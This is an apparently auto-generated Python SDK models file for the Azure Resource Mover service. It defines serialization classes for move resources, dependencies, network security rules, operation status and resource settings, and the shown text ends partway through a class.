class MoveResourceDependency(msrest.serialization.Model):
"""Defines the dependency of the move resource.
:param id: Gets the source ARM ID of the dependent resource.
:type id: str
:param resolution_status: Gets the dependency resolution status.
:type resolution_status: str
:param resolution_type: Defines the resolution type. Possible values include: "Manual",
"Automatic".
:type resolution_type: str or ~resource_mover_service_api.models.ResolutionType
:param dependency_type: Defines the dependency type. Possible values include:
"RequiredForPrepare", "RequiredForMove".
:type dependency_type: str or ~resource_mover_service_api.models.DependencyType
:param manual_resolution: Defines the properties for manual resolution.
:type manual_resolution: ~resource_mover_service_api.models.ManualResolutionProperties
:param automatic_resolution: Defines the properties for automatic resolution.
:type automatic_resolution: ~resource_mover_service_api.models.AutomaticResolutionProperties
:param is_optional: Gets or sets a value indicating whether the dependency is optional.
:type is_optional: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'resolution_status': {'key': 'resolutionStatus', 'type': 'str'},
'resolution_type': {'key': 'resolutionType', 'type': 'str'},
'dependency_type': {'key': 'dependencyType', 'type': 'str'},
'manual_resolution': {'key': 'manualResolution', 'type': 'ManualResolutionProperties'},
'automatic_resolution': {'key': 'automaticResolution', 'type': 'AutomaticResolutionProperties'},
'is_optional': {'key': 'isOptional', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
resolution_status: Optional[str] = None,
resolution_type: Optional[Union[str, "ResolutionType"]] = None,
dependency_type: Optional[Union[str, "DependencyType"]] = None,
manual_resolution: Optional["ManualResolutionProperties"] = None,
automatic_resolution: Optional["AutomaticResolutionProperties"] = None,
is_optional: Optional[str] = None,
**kwargs
):
super(MoveResourceDependency, self).__init__(**kwargs)
self.id = id
self.resolution_status = resolution_status
self.resolution_type = resolution_type
self.dependency_type = dependency_type
self.manual_resolution = manual_resolution
self.automatic_resolution = automatic_resolution
self.is_optional = is_optional
class MoveResourceDependencyOverride(msrest.serialization.Model):
"""Defines the dependency override of the move resource.
:param id: Gets or sets the ARM ID of the dependent resource.
:type id: str
:param target_id: Gets or sets the resource ARM id of either the MoveResource or the resource
ARM ID of
the dependent resource.
:type target_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'target_id': {'key': 'targetId', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
target_id: Optional[str] = None,
**kwargs
):
super(MoveResourceDependencyOverride, self).__init__(**kwargs)
self.id = id
self.target_id = target_id
class MoveResourceErrorBody(msrest.serialization.Model):
"""An error response from the Azure Migrate service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: An identifier for the error. Codes are invariant and are intended to be consumed
programmatically.
:vartype code: str
:ivar message: A message describing the error, intended to be suitable for display in a user
interface.
:vartype message: str
:ivar target: The target of the particular error. For example, the name of the property in
error.
:vartype target: str
:ivar details: A list of additional details about the error.
:vartype details: list[~resource_mover_service_api.models.MoveResourceErrorBody]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[MoveResourceErrorBody]'},
}
def __init__(
self,
**kwargs
):
super(MoveResourceErrorBody, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
class MoveResourceFilter(msrest.serialization.Model):
"""Move resource filter.
:param properties:
:type properties: ~resource_mover_service_api.models.MoveResourceFilterProperties
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'MoveResourceFilterProperties'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceFilterProperties"] = None,
**kwargs
):
super(MoveResourceFilter, self).__init__(**kwargs)
self.properties = properties
class MoveResourceFilterProperties(msrest.serialization.Model):
"""MoveResourceFilterProperties.
:param provisioning_state: The provisioning state.
:type provisioning_state: str
"""
_attribute_map = {
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
}
def __init__(
self,
*,
provisioning_state: Optional[str] = None,
**kwargs
):
super(MoveResourceFilterProperties, self).__init__(**kwargs)
self.provisioning_state = provisioning_state
class MoveResourceProperties(msrest.serialization.Model):
"""Defines the move resource properties.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar provisioning_state: Defines the provisioning states. Possible values include:
"Succeeded", "Updating", "Creating", "Failed".
:vartype provisioning_state: str or ~resource_mover_service_api.models.ProvisioningState
:param source_id: Required. Gets or sets the Source ARM Id of the resource.
:type source_id: str
:ivar target_id: Gets or sets the Target ARM Id of the resource.
:vartype target_id: str
:param existing_target_id: Gets or sets the existing target ARM Id of the resource.
:type existing_target_id: str
:param resource_settings: Gets or sets the resource settings.
:type resource_settings: ~resource_mover_service_api.models.ResourceSettings
:ivar source_resource_settings: Gets or sets the source resource settings.
:vartype source_resource_settings: ~resource_mover_service_api.models.ResourceSettings
:ivar move_status: Defines the move resource status.
:vartype move_status: ~resource_mover_service_api.models.MoveResourcePropertiesMoveStatus
:ivar depends_on: Gets or sets the move resource dependencies.
:vartype depends_on: list[~resource_mover_service_api.models.MoveResourceDependency]
:param depends_on_overrides: Gets or sets the move resource dependencies overrides.
:type depends_on_overrides:
list[~resource_mover_service_api.models.MoveResourceDependencyOverride]
:ivar is_resolve_required: Gets a value indicating whether the resolve action is required over
the move collection.
:vartype is_resolve_required: bool
:ivar errors: Defines the move resource errors.
:vartype errors: ~resource_mover_service_api.models.MoveResourcePropertiesErrors
"""
_validation = {
'provisioning_state': {'readonly': True},
'source_id': {'required': True},
'target_id': {'readonly': True},
'source_resource_settings': {'readonly': True},
'move_status': {'readonly': True},
'depends_on': {'readonly': True},
'is_resolve_required': {'readonly': True},
'errors': {'readonly': True},
}
_attribute_map = {
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'source_id': {'key': 'sourceId', 'type': 'str'},
'target_id': {'key': 'targetId', 'type': 'str'},
'existing_target_id': {'key': 'existingTargetId', 'type': 'str'},
'resource_settings': {'key': 'resourceSettings', 'type': 'ResourceSettings'},
'source_resource_settings': {'key': 'sourceResourceSettings', 'type': 'ResourceSettings'},
'move_status': {'key': 'moveStatus', 'type': 'MoveResourcePropertiesMoveStatus'},
'depends_on': {'key': 'dependsOn', 'type': '[MoveResourceDependency]'},
'depends_on_overrides': {'key': 'dependsOnOverrides', 'type': '[MoveResourceDependencyOverride]'},
'is_resolve_required': {'key': 'isResolveRequired', 'type': 'bool'},
'errors': {'key': 'errors', 'type': 'MoveResourcePropertiesErrors'},
}
def __init__(
self,
*,
source_id: str,
existing_target_id: Optional[str] = None,
resource_settings: Optional["ResourceSettings"] = None,
depends_on_overrides: Optional[List["MoveResourceDependencyOverride"]] = None,
**kwargs
):
super(MoveResourceProperties, self).__init__(**kwargs)
self.provisioning_state = None
self.source_id = source_id
self.target_id = None
self.existing_target_id = existing_target_id
self.resource_settings = resource_settings
self.source_resource_settings = None
self.move_status = None
self.depends_on = None
self.depends_on_overrides = depends_on_overrides
self.is_resolve_required = None
self.errors = None
class MoveResourcePropertiesErrors(MoveResourceError):
"""Defines the move resource errors.
:param properties: The move resource error body.
:type properties: ~resource_mover_service_api.models.MoveResourceErrorBody
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'MoveResourceErrorBody'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceErrorBody"] = None,
**kwargs
):
super(MoveResourcePropertiesErrors, self).__init__(properties=properties, **kwargs)
class MoveResourceStatus(msrest.serialization.Model):
"""Defines the move resource status.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar move_state: Defines the MoveResource states. Possible values include:
"AssignmentPending", "PreparePending", "PrepareInProgress", "PrepareFailed", "MovePending",
"MoveInProgress", "MoveFailed", "DiscardInProgress", "DiscardFailed", "CommitPending",
"CommitInProgress", "CommitFailed", "Committed", "DeleteSourcePending",
"ResourceMoveCompleted".
:vartype move_state: str or ~resource_mover_service_api.models.MoveState
:param job_status: Defines the job status.
:type job_status: ~resource_mover_service_api.models.JobStatus
:param errors: An error response from the azure resource mover service.
:type errors: ~resource_mover_service_api.models.MoveResourceError
"""
_validation = {
'move_state': {'readonly': True},
}
_attribute_map = {
'move_state': {'key': 'moveState', 'type': 'str'},
'job_status': {'key': 'jobStatus', 'type': 'JobStatus'},
'errors': {'key': 'errors', 'type': 'MoveResourceError'},
}
def __init__(
self,
*,
job_status: Optional["JobStatus"] = None,
errors: Optional["MoveResourceError"] = None,
**kwargs
):
super(MoveResourceStatus, self).__init__(**kwargs)
self.move_state = None
self.job_status = job_status
self.errors = errors
class MoveResourcePropertiesMoveStatus(MoveResourceStatus):
"""Defines the move resource status.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar move_state: Defines the MoveResource states. Possible values include:
"AssignmentPending", "PreparePending", "PrepareInProgress", "PrepareFailed", "MovePending",
"MoveInProgress", "MoveFailed", "DiscardInProgress", "DiscardFailed", "CommitPending",
"CommitInProgress", "CommitFailed", "Committed", "DeleteSourcePending",
"ResourceMoveCompleted".
:vartype move_state: str or ~resource_mover_service_api.models.MoveState
:param job_status: Defines the job status.
:type job_status: ~resource_mover_service_api.models.JobStatus
:param errors: An error response from the azure resource mover service.
:type errors: ~resource_mover_service_api.models.MoveResourceError
"""
_validation = {
'move_state': {'readonly': True},
}
_attribute_map = {
'move_state': {'key': 'moveState', 'type': 'str'},
'job_status': {'key': 'jobStatus', 'type': 'JobStatus'},
'errors': {'key': 'errors', 'type': 'MoveResourceError'},
}
def __init__(
self,
*,
job_status: Optional["JobStatus"] = None,
errors: Optional["MoveResourceError"] = None,
**kwargs
):
super(MoveResourcePropertiesMoveStatus, self).__init__(job_status=job_status, errors=errors, **kwargs)
class NetworkInterfaceResourceSettings(ResourceSettings):
"""Defines the network interface resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param ip_configurations: Gets or sets the IP configurations of the NIC.
:type ip_configurations:
list[~resource_mover_service_api.models.NicIpConfigurationResourceSettings]
:param enable_accelerated_networking: Gets or sets a value indicating whether accelerated
networking is enabled.
:type enable_accelerated_networking: bool
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'ip_configurations': {'key': 'ipConfigurations', 'type': '[NicIpConfigurationResourceSettings]'},
'enable_accelerated_networking': {'key': 'enableAcceleratedNetworking', 'type': 'bool'},
}
def __init__(
self,
*,
target_resource_name: str,
ip_configurations: Optional[List["NicIpConfigurationResourceSettings"]] = None,
enable_accelerated_networking: Optional[bool] = None,
**kwargs
):
super(NetworkInterfaceResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/networkInterfaces' # type: str
self.ip_configurations = ip_configurations
self.enable_accelerated_networking = enable_accelerated_networking
class NetworkSecurityGroupResourceSettings(ResourceSettings):
"""Defines the NSG resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param security_rules: Gets or sets Security rules of network security group.
:type security_rules: list[~resource_mover_service_api.models.NsgSecurityRule]
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'security_rules': {'key': 'securityRules', 'type': '[NsgSecurityRule]'},
}
def __init__(
self,
*,
target_resource_name: str,
security_rules: Optional[List["NsgSecurityRule"]] = None,
**kwargs
):
super(NetworkSecurityGroupResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/networkSecurityGroups' # type: str
self.security_rules = security_rules
class NicIpConfigurationResourceSettings(msrest.serialization.Model):
"""Defines NIC IP configuration properties.
:param name: Gets or sets the IP configuration name.
:type name: str
:param private_ip_address: Gets or sets the private IP address of the network interface IP
Configuration.
:type private_ip_address: str
:param private_ip_allocation_method: Gets or sets the private IP address allocation method.
:type private_ip_allocation_method: str
:param subnet: Defines reference to subnet.
:type subnet: ~resource_mover_service_api.models.SubnetReference
:param primary: Gets or sets a value indicating whether this IP configuration is the primary.
:type primary: bool
:param load_balancer_backend_address_pools: Gets or sets the references of the load balancer
backend address pools.
:type load_balancer_backend_address_pools:
list[~resource_mover_service_api.models.LoadBalancerBackendAddressPoolReference]
:param load_balancer_nat_rules: Gets or sets the references of the load balancer NAT rules.
:type load_balancer_nat_rules:
list[~resource_mover_service_api.models.LoadBalancerNatRuleReference]
:param public_ip: Defines reference to a public IP.
:type public_ip: ~resource_mover_service_api.models.PublicIpReference
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'private_ip_address': {'key': 'privateIpAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'privateIpAllocationMethod', 'type': 'str'},
'subnet': {'key': 'subnet', 'type': 'SubnetReference'},
'primary': {'key': 'primary', 'type': 'bool'},
'load_balancer_backend_address_pools': {'key': 'loadBalancerBackendAddressPools', 'type': '[LoadBalancerBackendAddressPoolReference]'},
'load_balancer_nat_rules': {'key': 'loadBalancerNatRules', 'type': '[LoadBalancerNatRuleReference]'},
'public_ip': {'key': 'publicIp', 'type': 'PublicIpReference'},
}
def __init__(
self,
*,
name: Optional[str] = None,
private_ip_address: Optional[str] = None,
private_ip_allocation_method: Optional[str] = None,
subnet: Optional["SubnetReference"] = None,
primary: Optional[bool] = None,
load_balancer_backend_address_pools: Optional[List["LoadBalancerBackendAddressPoolReference"]] = None,
load_balancer_nat_rules: Optional[List["LoadBalancerNatRuleReference"]] = None,
public_ip: Optional["PublicIpReference"] = None,
**kwargs
):
super(NicIpConfigurationResourceSettings, self).__init__(**kwargs)
self.name = name
self.private_ip_address = private_ip_address
self.private_ip_allocation_method = private_ip_allocation_method
self.subnet = subnet
self.primary = primary
self.load_balancer_backend_address_pools = load_balancer_backend_address_pools
self.load_balancer_nat_rules = load_balancer_nat_rules
self.public_ip = public_ip
class NsgReference(AzureResourceReference):
"""Defines reference to NSG.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
**kwargs
):
super(NsgReference, self).__init__(source_arm_resource_id=source_arm_resource_id, **kwargs)
class NsgSecurityRule(msrest.serialization.Model):
"""Security Rule data model for Network Security Groups.
:param name: Gets or sets the Security rule name.
:type name: str
:param access: Gets or sets whether network traffic is allowed or denied.
Possible values are “Allow” and “Deny”.
:type access: str
:param description: Gets or sets a description for this rule. Restricted to 140 chars.
:type description: str
:param destination_address_prefix: Gets or sets destination address prefix. CIDR or source IP
range.
A “*” can also be used to match all source IPs. Default tags such
as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used.
:type destination_address_prefix: str
:param destination_port_range: Gets or sets Destination Port or Range. Integer or range between
0 and 65535. A “*” can also be used to match all ports.
:type destination_port_range: str
:param direction: Gets or sets the direction of the rule.InBound or Outbound. The
direction specifies if rule will be evaluated on incoming or outgoing traffic.
:type direction: str
:param priority: Gets or sets the priority of the rule. The value can be between
100 and 4096. The priority number must be unique for each rule in the collection.
The lower the priority number, the higher the priority of the rule.
:type priority: int
:param protocol: Gets or sets Network protocol this rule applies to. Can be Tcp, Udp or All(*).
:type protocol: str
:param source_address_prefix: Gets or sets source address prefix. CIDR or source IP range. A
“*” can also be used to match all source IPs. Default tags such as ‘VirtualNetwork’,
‘AzureLoadBalancer’ and ‘Internet’ can also be used. If this is an ingress
rule, specifies where network traffic originates from.
:type source_address_prefix: str
:param source_port_range: Gets or sets Source Port or Range. Integer or range between 0 and
#. A “*” can also be used to match all ports.
:type source_port_range: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'access': {'key': 'access', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'destination_address_prefix': {'key': 'destinationAddressPrefix', 'type': 'str'},
'destination_port_range': {'key': 'destinationPortRange', 'type': 'str'},
'direction': {'key': 'direction', 'type': 'str'},
'priority': {'key': 'priority', 'type': 'int'},
'protocol': {'key': 'protocol', 'type': 'str'},
'source_address_prefix': {'key': 'sourceAddressPrefix', 'type': 'str'},
'source_port_range': {'key': 'sourcePortRange', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
access: Optional[str] = None,
description: Optional[str] = None,
destination_address_prefix: Optional[str] = None,
destination_port_range: Optional[str] = None,
direction: Optional[str] = None,
priority: Optional[int] = None,
protocol: Optional[str] = None,
source_address_prefix: Optional[str] = None,
source_port_range: Optional[str] = None,
**kwargs
):
super(NsgSecurityRule, self).__init__(**kwargs)
self.name = name
self.access = access
self.description = description
self.destination_address_prefix = destination_address_prefix
self.destination_port_range = destination_port_range
self.direction = direction
self.priority = priority
self.protocol = protocol
self.source_address_prefix = source_address_prefix
self.source_port_range = source_port_range
class OperationErrorAdditionalInfo(msrest.serialization.Model):
"""The operation error info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The error type.
:vartype type: str
:ivar info: The operation error info.
:vartype info: ~resource_mover_service_api.models.MoveErrorInfo
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'MoveErrorInfo'},
}
def __init__(
self,
**kwargs
):
super(OperationErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class OperationsDiscovery(msrest.serialization.Model):
"""Operations discovery class.
:param name: Gets or sets Name of the API.
The name of the operation being performed on this particular object. It should
match the action name that appears in RBAC / the event service.
Examples of operations include:
* Microsoft.Compute/virtualMachine/capture/action
* Microsoft.Compute/virtualMachine/restart/action
* Microsoft.Compute/virtualMachine/write
* Microsoft.Compute/virtualMachine/read
* Microsoft.Compute/virtualMachine/delete
Each action should include, in order:
(1) Resource Provider Namespace
(2) Type hierarchy for which the action applies (e.g. server/databases for a SQL
Azure database)
(3) Read, Write, Action or Delete indicating which type applies. If it is a PUT/PATCH
on a collection or named value, Write should be used.
If it is a GET, Read should be used. If it is a DELETE, Delete should be used. If it
is a POST, Action should be used.
As a note: all resource providers would need to include the "{Resource Provider
Namespace}/register/action" operation in their response.
This API is used to register for their service, and should include details about the
operation (e.g. a localized name for the resource provider + any special
considerations like PII release).
:type name: str
:param is_data_action: Indicates whether the operation is a data action.
:type is_data_action: bool
:param display: Contains the localized display information for this particular operation /
action. These
value will be used by several clients for
(1) custom role definitions for RBAC;
(2) complex query filters for the event service; and
(3) audit history / records for management operations.
:type display: ~resource_mover_service_api.models.Display
:param origin: Gets or sets Origin.
The intended executor of the operation; governs the display of the operation in the
RBAC UX and the audit logs UX.
Default value is "user,system".
:type origin: str
:param properties: Any object.
:type properties: any
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
'display': {'key': 'display', 'type': 'Display'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'object'},
}
def __init__(
self,
*,
name: Optional[str] = None,
is_data_action: Optional[bool] = None,
display: Optional["Display"] = None,
origin: Optional[str] = None,
properties: Optional[Any] = None,
**kwargs
):
super(OperationsDiscovery, self).__init__(**kwargs)
self.name = name
self.is_data_action = is_data_action
self.display = display
self.origin = origin
self.properties = properties
class OperationsDiscoveryCollection(msrest.serialization.Model):
"""Collection of ClientDiscovery details.
:param value: Gets or sets the ClientDiscovery details.
:type value: list[~resource_mover_service_api.models.OperationsDiscovery]
:param next_link: Gets or sets the value of next link.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[OperationsDiscovery]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["OperationsDiscovery"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(OperationsDiscoveryCollection, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class OperationStatus(msrest.serialization.Model):
"""Operation status REST resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Operation name.
:vartype name: str
:ivar status: Status of the operation. ARM expects the terminal status to be one of Succeeded/
Failed/ Canceled. All other values imply that the operation is still running.
:vartype status: str
:ivar start_time: Start time.
:vartype start_time: str
:ivar end_time: End time.
:vartype end_time: str
:ivar error: Error stating all error details for the operation.
:vartype error: ~resource_mover_service_api.models.OperationStatusError
:ivar properties: Custom data.
:vartype properties: any
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'status': {'readonly': True},
'start_time': {'readonly': True},
'end_time': {'readonly': True},
'error': {'readonly': True},
'properties': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'error': {'key': 'error', 'type': 'OperationStatusError'},
'properties': {'key': 'properties', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(OperationStatus, self).__init__(**kwargs)
self.id = None
self.name = None
self.status = None
self.start_time = None
self.end_time = None
self.error = None
self.properties = None
class OperationStatusError(msrest.serialization.Model):
"""Class for operation status errors.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar details: The error details.
:vartype details: list[~resource_mover_service_api.models.OperationStatusError]
:ivar additional_info: The additional info.
:vartype additional_info: list[~resource_mover_service_api.models.OperationErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'details': {'key': 'details', 'type': '[OperationStatusError]'},
'additional_info': {'key': 'additionalInfo', 'type': '[OperationErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(OperationStatusError, self).__init__(**kwargs)
self.code = None
self.message = None
self.details = None
self.additional_info = None
class PrepareRequest(msrest.serialization.Model):
"""Defines the request body for initiate prepare operation.
All required parameters must be populated in order to send to Azure.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Required. Gets or sets the list of resource Id's, by default it accepts
move resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_validation = {
'move_resources': {'required': True},
}
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
move_resources: List[str],
validate_only: Optional[bool] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(PrepareRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
class PublicIPAddressResourceSettings(ResourceSettings):
"""Defines the public IP address resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param domain_name_label: Gets or sets the domain name label.
:type domain_name_label: str
:param fqdn: Gets or sets the fully qualified domain name.
:type fqdn: str
:param public_ip_allocation_method: Gets or sets public IP allocation method.
:type public_ip_allocation_method: str
:param sku: Gets or sets public IP sku.
:type sku: str
:param zones: Gets or sets public IP zones.
:type zones: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'domain_name_label': {'key': 'domainNameLabel', 'type': 'str'},
'fqdn': {'key': 'fqdn', 'type': 'str'},
'public_ip_allocation_method': {'key': 'publicIpAllocationMethod', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'str'},
'zones': {'key': 'zones', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
domain_name_label: Optional[str] = None,
fqdn: Optional[str] = None,
public_ip_allocation_method: Optional[str] = None,
sku: Optional[str] = None,
zones: Optional[str] = None,
**kwargs
):
super(PublicIPAddressResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/publicIPAddresses' # type: str
self.domain_name_label = domain_name_label
self.fqdn = fqdn
self.public_ip_allocation_method = public_ip_allocation_method
self.sku = sku
self.zones = zones
class PublicIpReference(AzureResourceReference):
"""Defines reference to a public IP.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
**kwargs
):
super(PublicIpReference, self).__init__(source_arm_resource_id=source_arm_resource_id, **kwargs)
class RequiredForResourcesCollection(msrest.serialization.Model):
"""Required for resources collection.
:param source_ids: Gets or sets the list of source Ids for which the input resource is
required.
:type source_ids: list[str]
"""
_attribute_map = {
'source_ids': {'key': 'sourceIds', 'type': '[str]'},
}
def __init__(
self,
*,
source_ids: Optional[List[str]] = None,
**kwargs
):
super(RequiredForResourcesCollection, self).__init__(**kwargs)
self.source_ids = source_ids
class ResourceGroupResourceSettings(ResourceSettings):
"""Defines the resource group resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(ResourceGroupResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'resourceGroups' # type: str
class ResourceMoveRequest(msrest.serialization.Model):
"""Defines the request body for resource move operation.
All required parameters must be populated in order to send to Azure.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Required. Gets or sets the list of resource Id's, by default it accepts
move resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_validation = {
'move_resources': {'required': True},
}
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
move_resources: List[str],
validate_only: Optional[bool] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(ResourceMoveRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
class SqlDatabaseResourceSettings(ResourceSettings):
"""Defines the Sql Database resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param zone_redundant: Defines the zone redundant resource setting. Possible values include:
"Enable", "Disable".
:type zone_redundant: str or ~resource_mover_service_api.models.ZoneRedundant
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'zone_redundant': {'key': 'zoneRedundant', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
zone_redundant: Optional[Union[str, "ZoneRedundant"]] = None,
**kwargs
):
super(SqlDatabaseResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Sql/servers/databases' # type: str
self.zone_redundant = zone_redundant
class SqlElasticPoolResourceSettings(ResourceSettings):
"""Defines the Sql ElasticPool resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param zone_redundant: Defines the zone redundant resource setting. Possible values include:
"Enable", "Disable".
:type zone_redundant: str or ~resource_mover_service_api.models.ZoneRedundant
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'zone_redundant': {'key': 'zoneRedundant', 'type': 'str'},
}
